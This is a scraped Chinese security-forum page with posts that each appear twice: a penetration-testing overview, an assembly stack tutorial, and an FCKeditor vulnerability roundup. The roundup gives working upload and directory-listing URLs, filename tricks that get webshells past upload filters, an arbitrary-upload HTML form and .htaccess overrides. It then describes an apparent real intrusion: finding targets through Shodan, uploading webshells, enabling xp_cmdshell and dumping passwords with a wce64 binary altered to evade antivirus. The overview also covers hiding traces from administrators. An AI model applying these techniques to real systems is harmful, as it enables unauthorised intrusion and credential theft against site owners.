一次完整的渗透测试流程

渗透测试jizi_smile 发表了文章 • 0 个评论 • 82 次浏览 • 6 天前 • 来自相关话题

转自:https://blog.csdn.net/qq_36119192/article/details/84674109 





渗透测试

渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束。 
渗透测试分为 白盒测试 和 黑盒测试
白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透我们现在就模拟黑客对一个网站进行渗透测试,这属于黑盒测试,我们只知道该网站的URL,其他什么的信息都不知道。接下来,我就给大家分享下黑盒渗透测试的流程和思路!当我们确定好了一个目标进行渗透之后,第一步该做的是什么呢?   信息收集  第一步做的就是信息收集,正所谓知己知彼百战百胜,我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。更多的关于信息收集,我在另一篇文章中很详细的介绍了信息收集需要收集哪些信息,以及信息收集过程中需要用到的工具,传送门——>https://blog.csdn.net/qq_36119192/article/details/84027438   漏洞探测 当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入    , 传送门——>https://blog.csdn.net/qq_36119192/article/details/81987834 XSS跨站脚本  ,传送门—>https://blog.csdn.net/qq_36119192/article/details/82469035CSRF跨站请求伪造  ,  传送门->https://blog.csdn.net/qq_36119192/article/details/82820115 XXE漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/84993356 SSRF服务端请求伪造漏洞,传送门->https://blog.csdn.net/qq_36119192/article/details/84980510文件包含漏洞  ,  传送门—>https://blog.csdn.net/qq_36119192/article/details/82823685文件上传漏洞 , 传送门——>https://blog.csdn.net/qq_36119192/article/details/82848056 文件解析漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/82834063 远程代码执行漏洞 , 传送门—>https://blog.csdn.net/qq_36119192/article/details/84848441CORS跨域资源共享漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/86511786越权访问漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/86540786目录浏览漏洞和任意文件读取/下载漏洞,传送门——https://blog.csdn.net/qq_36119192/article/details/86496362 struts2漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/87273304 JAVA反序列化漏洞,传送门——>https://blog.csdn.net/qq_36119192/article/details/84504405这些是网站经常发现的一些漏洞,还有一些网站漏洞,这里我就不一一列举出来了。网站漏洞扫描工具也有很多,比如:AWVS  ,传送门——>https://blog.csdn.net/qq_36119192/article/details/83187475 AppScan ,传送门—>https://blog.csdn.net/qq_36119192/article/details/83042173 Owasp-Zap ,传送门—>https://blog.csdn.net/qq_36119192/article/details/84109721 Nessus ,传送门——>https://blog.csdn.net/qq_36119192/article/details/82852117 网站漏洞扫描工具我就列举这几种,还有很多,最常用的是这几个!  漏洞利用 当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下:SQL注入 , 传送门——>https://blog.csdn.net/qq_36119192/article/details/84479207 XSS跨站脚本,传送门——>https://blog.csdn.net/qq_36119192/article/details/82731839 抓包改包工具,——>https://blog.csdn.net/qq_36119192/article/details/84310858 文件上传漏洞,上传漏洞的话,我们一般会上传一句话木马上去,进而再获得webshell,传送门——>https://blog.csdn.net/qq_36119192/article/details/84563791 但是,获得了webshell后,一般权限很低,所以我们需要提权https://blog.csdn.net/qq_36119192/article/details/84887874 内网转发

当我们获取到了网站的Webshell之后,如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。那么,我们怎么借助网站的服务器和内网通信呢,传送门——>https://blog.csdn.net/qq_36119192/article/details/84568266

内网渗透

当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息,传送门——>https://blog.csdn.net/qq_36119192/article/details/82079150
内网用户基本都是使用的windows系统,而且大多数是使用的windows7,在windows7中有很多漏洞,比如MS17_010这种漏洞,我们可以探测其windows系统是否存在这种漏洞,如果有这种漏洞,直接拿shell。传送门——>https://blog.csdn.net/qq_36119192/article/details/83215257 
企业内网大多数是一个域环境。所以,我们只需要找到域控服务器,并拿下其权限,就可以登录其他所有用户的主机了。
当然,内网中也有可能存在供内网使用的内网服务器,我们可以进一步渗透拿下其权限。
至于怎么拿下内网中机器的权限,这要看内网环境了。我这里只是说下大概的一个思路。

痕迹清除

当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的痕迹,以免被网站管理员发现,

撰写渗透测试报告

在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!
我们做的这一切的一切都是为了营造一个更安全更可信任的网络环境,大家切记不要利用本篇文章进行违法犯罪行为!
未完待续。。。。。。 查看全部
转自:https://blog.csdn.net/qq_36119192/article/details/84674109 
20181201221817863.png


渗透测试


渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束。 
渗透测试分为 白盒测试黑盒测试
  • 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析
  • 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透
我们现在就模拟黑客对一个网站进行渗透测试,这属于黑盒测试,我们只知道该网站的URL,其他什么的信息都不知道。接下来,我就给大家分享下黑盒渗透测试的流程和思路!当我们确定好了一个目标进行渗透之后,第一步该做的是什么呢?  

 信息收集

  第一步做的就是信息收集,正所谓知己知彼百战百胜,我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。更多的关于信息收集,我在另一篇文章中很详细的介绍了信息收集需要收集哪些信息,以及信息收集过程中需要用到的工具,传送门——>https://blog.csdn.net/qq_36119192/article/details/84027438   

漏洞探测

 当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:这些是网站经常发现的一些漏洞,还有一些网站漏洞,这里我就不一一列举出来了。网站漏洞扫描工具也有很多,比如:网站漏洞扫描工具我就列举这几种,还有很多,最常用的是这几个! 

 漏洞利用

 当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下:

内网转发



    当我们获取到了网站的Webshell之后,如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。那么,我们怎么借助网站的服务器和内网通信呢,传送门——>https://blog.csdn.net/qq_36119192/article/details/84568266


    内网渗透


    当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息,传送门——>https://blog.csdn.net/qq_36119192/article/details/82079150
    内网用户基本都是使用的windows系统,而且大多数是使用的windows7,在windows7中有很多漏洞,比如MS17_010这种漏洞,我们可以探测其windows系统是否存在这种漏洞,如果有这种漏洞,直接拿shell。传送门——>https://blog.csdn.net/qq_36119192/article/details/83215257 
    企业内网大多数是一个域环境。所以,我们只需要找到域控服务器,并拿下其权限,就可以登录其他所有用户的主机了。
    当然,内网中也有可能存在供内网使用的内网服务器,我们可以进一步渗透拿下其权限。
    至于怎么拿下内网中机器的权限,这要看内网环境了。我这里只是说下大概的一个思路。


    痕迹清除


    当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
    我这里只是教大家在渗透进去之后如何清除我们留下的痕迹,以免被网站管理员发现,


    撰写渗透测试报告


    在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!
    我们做的这一切的一切都是为了营造一个更安全更可信任的网络环境,大家切记不要利用本篇文章进行违法犯罪行为!
    未完待续。。。。。。

    【转】堆栈和画堆栈图

    编程snow 发表了文章 • 0 个评论 • 76 次浏览 • 6 天前 • 来自相关话题

           根据咱们学汇编的经验呀,汇编用的最多的是寄存器和内存之间的不断相互传值传地址,井然有序。
           然而,你知道它们具体是怎么进行数据传递和交换的吗?
     
                                                           
                                                                  




           我们知道寄存器能够保存的数据量不多,所以需要存储大量数据的时候就需要保存到内存里面了。
     
             那么:如果我存了一大堆数据,但是我想知道究竟存了多少数据,要怎么办呢?
             如果我想在这对数据里面抽出某一个数据出来使用,要怎么抽呢?
          用完这些数据是继续保存还是丢弃来呢?丢到哪里去呢?
              
                                                                    
                                                                     




                           针对以上种种问题,这里有个完美的解决方案—〉堆栈
                                               
                                                                      




                                         NO.1 首先我们来了解下什么是堆栈
                                                                               
                                                                  




                                       根据百度百科的记载,堆栈的定义如下
     
                                             




           顾名思义,就是在调用程序的时候,电脑会自动开辟一块内存空间专门用来放数据的,然后我们的数据就会想货物一样一个一个往上堆,需要用到的时候就拿出来使用,当程序执行完之后再腾出空间给其他程序继续使用,这个就是堆栈。
                       这里两个概念需要了解下,一个是栈顶,一个是栈底。
                                      栈顶:顾名思义,就是栈道的顶部啦~
                               栈底:顾名思义,就是栈道的底部啦~
                                                              
                                    




              然后呢,通常我们规定使用寄存器里面的EBP寄存器保存一个地址,作为堆栈的栈底,ESP寄存器保存一个地址,作为堆栈的栈顶,用EAX寄存器来保存需要输出的数据。    
          举个例子,可以看到,有个寄存器EBP和ESP所保存的地址如下                        
                 
                                        



                                                
              ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓所以它们在堆栈中是这样的↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓  
                                                                                       
                                                          




                   ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓现在要实现以下功能↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
                              
                                     




    以上的指令含义分别为:1.将立即数“2”压进栈道里,并且栈顶提升4个字节
                                                           2.将立即数“1”压进栈道里,并且栈顶提升4个字节
                                                         3.进入名为“kong”的函数,把地址“0040100F”保存到EIP寄存器     里,并且把00401070(0040106c+0x4)压进栈道,并且栈顶提升4个字节
                                                          4.从函数中出来以后,栈顶esp+8(恢复栈顶)
     
                进入名为“kong”的函数后,需要执行以下的指令:
                                
                                      
                                         




              ↓↓↓↓↓↓↓↓↓↓所以,“准备工作”堆栈图如下↓↓↓↓↓↓↓↓↓↓
                                                           
                                       




      ↓↓↓↓↓↓↓↓↓↓然后,执行完程序之后,堆栈的收尾工作如下↓↓↓↓↓↓↓↓↓↓
                                                                                         
                                                                     




                      
      这篇文章将汇编的堆栈讲的非常详细,对我有非常大的帮助。
     原博地址:https://blog.csdn.net/qq_41884002/article/details/81452889

      查看全部
           根据咱们学汇编的经验呀,汇编用的最多的是寄存器和内存之间的不断相互传值传地址,井然有序。
           然而,你知道它们具体是怎么进行数据传递和交换的吗?
     
                                                           
                                                                  
    20180806134611410.jpg


           我们知道寄存器能够保存的数据量不多,所以需要存储大量数据的时候就需要保存到内存里面了。
     
             那么:如果我存了一大堆数据,但是我想知道究竟存了多少数据,要怎么办呢?
             如果我想在这对数据里面抽出某一个数据出来使用,要怎么抽呢?
          用完这些数据是继续保存还是丢弃来呢?丢到哪里去呢?
              
                                                                    
                                                                     
    20180806135233534.jpg


                           针对以上种种问题,这里有个完美的解决方案—〉堆栈
                                               
                                                                      
    20180806135631324.jpg


                                         NO.1 首先我们来了解下什么是堆栈
                                                                               
                                                                  
    20180806140343536.png


                                       根据百度百科的记载,堆栈的定义如下
     
                                             
    20180806140745702.png


           顾名思义,就是在调用程序的时候,电脑会自动开辟一块内存空间专门用来放数据的,然后我们的数据就会想货物一样一个一个往上堆,需要用到的时候就拿出来使用,当程序执行完之后再腾出空间给其他程序继续使用,这个就是堆栈。
                       这里两个概念需要了解下,一个是栈顶,一个是栈底。
                                      栈顶:顾名思义,就是栈道的顶部啦~
                               栈底:顾名思义,就是栈道的底部啦~
                                                              
                                    
    20180806223937357.jpg


              然后呢,通常我们规定使用寄存器里面的EBP寄存器保存一个地址,作为堆栈的栈底,ESP寄存器保存一个地址,作为堆栈的栈顶,用EAX寄存器来保存需要输出的数据。    
          举个例子,可以看到,有个寄存器EBP和ESP所保存的地址如下                        
                 
                                        
    20180809115839293.png

                                                
              ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓所以它们在堆栈中是这样的↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓  
                                                                                       
                                                          
    20180809123200158.png


                   ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓现在要实现以下功能↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
                              
                                     
    20180809123840740.png


    以上的指令含义分别为:1.将立即数“2”压进栈道里,并且栈顶提升4个字节
                                                           2.将立即数“1”压进栈道里,并且栈顶提升4个字节
                                                         3.进入名为“kong”的函数,把地址“0040100F”保存到EIP寄存器     里,并且把00401070(0040106c+0x4)压进栈道,并且栈顶提升4个字节
                                                          4.从函数中出来以后,栈顶esp+8(恢复栈顶)
     
                进入名为“kong”的函数后,需要执行以下的指令:
                                
                                      
                                         
    20180809130300994.png


              ↓↓↓↓↓↓↓↓↓↓所以,“准备工作”堆栈图如下↓↓↓↓↓↓↓↓↓↓
                                                           
                                       
    20180809133644233.png


      ↓↓↓↓↓↓↓↓↓↓然后,执行完程序之后,堆栈的收尾工作如下↓↓↓↓↓↓↓↓↓↓
                                                                                         
                                                                     
    20180809135205265.png


                      
      这篇文章将汇编的堆栈讲的非常详细,对我有非常大的帮助。
     原博地址:https://blog.csdn.net/qq_41884002/article/details/81452889

     

    Fckeditor漏洞总结(转)

    Web安全渗透fireant 发表了文章 • 1 个评论 • 147 次浏览 • 6 天前 • 来自相关话题

    Fckeditor漏洞总结(转)
    最近进行漏洞挖掘时遇到不少Fckeditor编辑器,找到一篇总结文章
    1.1Fckeditor漏洞总结
       有些漏洞看起来简单,级别比较低,不如SQL注入等漏洞来的直接,但在条件合适的情况下,小漏洞发挥大作用,一直以来都想做一个Fckeditor漏洞总结,免得每次遇到目标都需要重新搜索,浪费时间。
     
    1.1.1FCKeditor编辑器漏洞利用总结
     
    1.判断fckeditor版本
    通过/fckeditor/editor/dialog/fck_about.html和/FCKeditor/_whatsnew.html页面文件中的版本号来确定。例如访问http://***.1**.***.***:8081/fckeditor/_whatsnew.html,获知其版本号为2.4.3。
     
    2.常见的测试上传地址
      Fckeditor编辑器默认会存在test.html和uploadtest.html文件,直接访问这些文件可以获取当前文件夹文件名称以及上传文件,有的版本可以直接上传任意文件类型,测试上传地址有:(1)FCKeditor/editor/filemanager/browser/default/connectors/test.html

    (2)FCKeditor/editor/filemanager/upload/test.html

    (3)FCKeditor/editor/filemanager/connectors/test.html

    (4)FCKeditor/editor/filemanager/connectors/uploadtest.html


     3.示例上传地址FCKeditor/_samples/default.html

    FCKeditor/_samples/asp/sample01.asp

    FCKeditor/_samples/asp/sample02.asp

    FCKeditor/_samples/asp/sample03.asp

    FCKeditor/_samples/asp/sample04.asp

    FCKeditor/_samples/default.html

    FCKeditor/editor/fckeditor.htm

    FCKeditor/editor/fckdialog.html
     4.常见的上传地址
    (1)connector.aspx文件FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 
    FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp 
    (2)browser.html文件FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
    fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
    fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php 
     
    5. Windows 2003+IIS6文件解析路径漏洞
       通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。其shell地址为: http://www.somesite.com/images/upload/201806/image/1.asp/1.jpg  
    6.iis6突破文件夹限制Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp 
     
    7.突破文件名限制
    (1)二次重复上传文件突破“.”变成“-”限制
    新版FCK上传shell.asp;.jpg变shell_asp;.jpg,然后继续上传同名文件可变为shell.asp;(1).jpg
    (2)提交shell.php+空格绕过
    空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。
     
    8.列目录
    (1)FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。
    (2)根据xml返回信息查看网站目录http://***.1**.***.***:8081/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp 
    (3)获取当前文件夹FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 
    (4)浏览E盘文件/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/ 
    (5)JSP 版本FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/ 
    9.修改Media 类型进行上传
    FCKeditor 2.4.2  For php以下版本在处理PHP上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址为实际地址:<form id="frmUpload" enctype="multipart/form-data"
    action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
    <input type="file" name="NewFile" size="50"><br>
    <input id="btnUpload" type="submit" value="Upload">
    </form> 
     
    10.htaccess文件突破
    htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
    (1).htaccess文件内容AppType  application/x-httpd-php  .jpg 
    另外一种方法也可以,其内容为: <FilesMatch "cimer">
    SetHandler application/x-httpd-php
    </FilesMatch> 
    上传带cimer后缀的webshell文件,访问地址即可得到webshell
    (2)上传.htaccess文件
    (3)上传图片木马
    (4)借助该漏洞,可以实现webshell的访问
     
    1.1.2搜索FCKeditor目标
     
    1.在shodan.io网站搜索FCKeditor关键字
       在shodan.io网站搜索FCKeditor关键字https://www.shodan.io/search?query=”FCKeditor”对关键字进行查询,不同的关键字其出来的效果不一样。 
     
    2.逐个查看目标记录信息
       对shodan.io网站搜索的24条记录进行逐个查看,也即单击shodan搜索记录中的Details链接,即可查看目标的详细信息,如图3所示,建议新建窗口打开该链接地址,在该IP地址信息中包含国家、城市、组织、ISP和端口等信息。
     
    1.1.3漏洞利用及分析
     
    1.根据端口访问服务器
       单击shodan中搜索出来的服务信息中的绿色转向箭头即可直接访问目标服务器。
     
     
    2.对网站目录进行逐个查看获取Fckedit漏洞利用页面
       通过对该网站fckeditor 编辑器所在文件夹进行逐层访问,获取其上传测试页面地址:http://***.1**.***.***:8081/fckeditor/editor/filemanager/upload/test.html
     
    3.查看和验证上传文件
        如图6所示,到该网站/UserFiles/目录,可以看到上传的2014.aspx及cmd.php文件。
     
     
    4.获取webshell及数据库密码
    单击/UserFiles/目录中的2014.aspx文件,直接获取webshell。
     
     
    5.服务器提权并获取服务器密码
    (1)获取服务器架构
    (2)连接数据库恢复xp_cmdshell
        在webshell中单击DataBase进行数据库管理,选择mssql,然后输入sa账号对应的密码,进行连接,连接成功后,在SQLExec中选择Add xp_cmdshell。
    (3)获取当前数据库管理员密码明文
    将wce64.exe进行免杀处理,然后上传到服务器上,通过xp_cmdshell执行命令:
    Exec master.dbo.xp_cmdshell 'E:\dlty\UserFiles\wce64 -w'
     
     1.1.4渗透总结及分析
    1. sqlserver 2000直接提权。在本例中还可以通过sqlmap进行mssql数据库直连进行提权以及执行命令等操作,由于本案例中的数据库是sqlserver 2000,sa账号可以直接提权到服务器权限。
    2.Fckeditor中的test.html文件可以直接上传任意文件类型
    3.可以通过Fckeditor还可以浏览目录。这个在渗透中特别有用,可以用来查看网站的目录结构,运气好,可以查看xml配置文件,以及下载源代码文件等。
    4.在本案例中的目录信息危害太大。可以对所有文件及目录进行查看,即使未获取编辑器漏洞,也可以通过源代码文件获取数据库密码。 查看全部
    Fckeditor漏洞总结(转)
    最近进行漏洞挖掘时遇到不少Fckeditor编辑器,找到一篇总结文章
    1.1Fckeditor漏洞总结
       有些漏洞看起来简单,级别比较低,不如SQL注入等漏洞来的直接,但在条件合适的情况下,小漏洞发挥大作用,一直以来都想做一个Fckeditor漏洞总结,免得每次遇到目标都需要重新搜索,浪费时间。
     
    1.1.1FCKeditor编辑器漏洞利用总结
     
    1.判断fckeditor版本
    通过/fckeditor/editor/dialog/fck_about.html和/FCKeditor/_whatsnew.html页面文件中的版本号来确定。例如访问http://***.1**.***.***:8081/fckeditor/_whatsnew.html,获知其版本号为2.4.3。
     
    2.常见的测试上传地址
      Fckeditor编辑器默认会存在test.html和uploadtest.html文件,直接访问这些文件可以获取当前文件夹文件名称以及上传文件,有的版本可以直接上传任意文件类型,测试上传地址有:
    (1)FCKeditor/editor/filemanager/browser/default/connectors/test.html

    (2)FCKeditor/editor/filemanager/upload/test.html

    (3)FCKeditor/editor/filemanager/connectors/test.html

    (4)FCKeditor/editor/filemanager/connectors/uploadtest.html


     3.示例上传地址
    FCKeditor/_samples/default.html

    FCKeditor/_samples/asp/sample01.asp

    FCKeditor/_samples/asp/sample02.asp

    FCKeditor/_samples/asp/sample03.asp

    FCKeditor/_samples/asp/sample04.asp

    FCKeditor/_samples/default.html

    FCKeditor/editor/fckeditor.htm

    FCKeditor/editor/fckdialog.html

     4.常见的上传地址
    (1)connector.aspx文件
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 
    FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
     
    (2)browser.html文件
    FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
    fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
    fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
     
     
    5. Windows 2003+IIS6文件解析路径漏洞
       通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。其shell地址为: 
    http://www.somesite.com/images/upload/201806/image/1.asp/1.jpg 
     
    6.iis6突破文件夹限制
    Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
     
     
    7.突破文件名限制
    (1)二次重复上传文件突破“.”变成“-”限制
    新版FCK上传shell.asp;.jpg变shell_asp;.jpg,然后继续上传同名文件可变为shell.asp;(1).jpg
    (2)提交shell.php+空格绕过
    空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。
     
    8.列目录
    (1)FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。
    (2)根据xml返回信息查看网站目录
    http://***.1**.***.***:8081/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
     
    (3)获取当前文件夹
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
     
    (4)浏览E盘文件
    /FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
     
    (5)JSP 版本
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
     
    9.修改Media 类型进行上传
    FCKeditor 2.4.2  For php以下版本在处理PHP上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址为实际地址:
    <form id="frmUpload" enctype="multipart/form-data"
    action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
    <input type="file" name="NewFile" size="50"><br>
    <input id="btnUpload" type="submit" value="Upload">
    </form>
     
     
    10.htaccess文件突破
    htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
    (1).htaccess文件内容
    AppType  application/x-httpd-php  .jpg
     
    另外一种方法也可以,其内容为: 
    <FilesMatch "cimer">
    SetHandler application/x-httpd-php
    </FilesMatch>
     
    上传带cimer后缀的webshell文件,访问地址即可得到webshell
    (2)上传.htaccess文件
    (3)上传图片木马
    (4)借助该漏洞,可以实现webshell的访问
     
    1.1.2搜索FCKeditor目标
     
